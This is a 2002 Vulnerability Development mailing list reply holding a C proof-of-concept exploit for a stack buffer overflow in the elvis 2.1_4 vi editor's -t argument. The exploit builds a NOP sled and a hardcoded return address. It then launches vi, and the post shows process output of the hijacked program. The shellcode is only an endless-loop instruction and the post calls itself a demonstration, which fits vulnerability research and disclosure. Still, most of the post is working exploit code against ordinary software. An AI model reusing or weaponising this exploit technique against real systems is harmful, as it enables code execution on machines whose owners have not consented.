Vulnerability Development mailing list archives
Re: VIM Buffer Overflow
From: Felipe Cerqueira <fcerqueira () bufferoverflow org>
Date: Sun, 17 Feb 2002 11:31:24 -0300 (BRT)
/* elvis 2.1_4 (slackware 8.0) Expl by skylazart
*
* It's only for demonstration purpose!
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int
main (int argc, char **argv)
{
char buffer[120 + 1];
long ret_addr = 0xbffffcfc;
char sc[] = "\xeb\xfe"; /* loop for me please! ;) */
int i;
char *argv1[] = {"/usr/bin/vi", "-t", buffer, NULL};
if ( argc > 1 )
ret_addr += atoi ( argv[1] );
for ( i = 0; i < sizeof (buffer); i += 4 )
*(long *)&buffer[i] = ret_addr;
memset (buffer, 0x90, 22);
buffer[22] = sc[0];
buffer[23] = sc[1];
buffer[120] = '\0';
printf ("returning to 0x%08lx\n", ret_addr);
printf ("endless loop.. ps auxw and kill it \\xeb\\xfe jump
*ebp;)\n");
execve ("/usr/bin/vi", argv1, NULL);
return (0);
}
it only stops consisting...
root 3740 99.9 0.3 1668 780 tty2 R 11:30 0:14 /usr/bin/vi
-t ??
--
Felipe Cerqueira
Buffer Overflow Inf. Ltda.
Current thread:
- VIM Buffer Overflow Aramis Orlando (Feb 15)
- Re: VIM Buffer Overflow KF (Feb 16)
- Re: VIM Buffer Overflow Felipe Cerqueira (Feb 17)
- Re: VIM Buffer Overflow KF (Feb 16)